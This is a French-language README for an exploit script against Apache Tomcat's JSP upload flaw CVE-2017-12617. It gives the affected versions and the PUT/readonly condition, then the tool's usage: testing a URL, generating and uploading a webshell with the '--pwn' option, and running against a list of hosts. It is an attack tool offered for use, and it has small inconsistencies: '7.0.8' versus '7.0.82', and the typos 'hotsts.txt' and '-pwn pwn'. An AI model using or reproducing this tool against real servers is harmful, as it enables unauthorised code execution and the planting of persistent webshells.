
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - Contournement du téléversement JSP / Exécution de code à distance
CVE-2017-12617 vulnérabilité critique d'exécution de code à distance (RCE) découverte dans Apache Tomcat
affecte les systèmes avec la méthode HTTP PUT activée (via le réglage du paramètre d'initialisation "read-only" du servlet Default sur "false") sont affectés.
Les versions de Tomcat antérieures à 9.0.1 (Beta), 8.5.23, 8.0.47 et 7.0.82 contiennent une vulnérabilité potentiellement dangereuse
d'exécution de code à distance (RCE) sur tous les systèmes d'exploitation si le servlet par défaut est
configuré avec le paramètre readonly défini sur false ou si le servlet WebDAV est activé avec le
paramètre readonly défini sur false
./cve-2017-12617.py [options]
options:
-u ,--url [::] vérifie si l'URL cible est vulnérable
-p,--pwn [::] génère un webshell et le téléverse
-l,--list [::] liste d'hôtes
[+]usage:
./cve-2017-12617.py -u http://127.0.0.1
./cve-2017-12617.py --url http://127.0.0.1
./cve-2017-12617.py -u http://127.0.0.1 -p pwn
./cve-2017-12617.py --url http://127.0.0.1 -pwn pwn
./cve-2017-12617.py -l hotsts.txt
./cve-2017-12617.py --list hosts.txt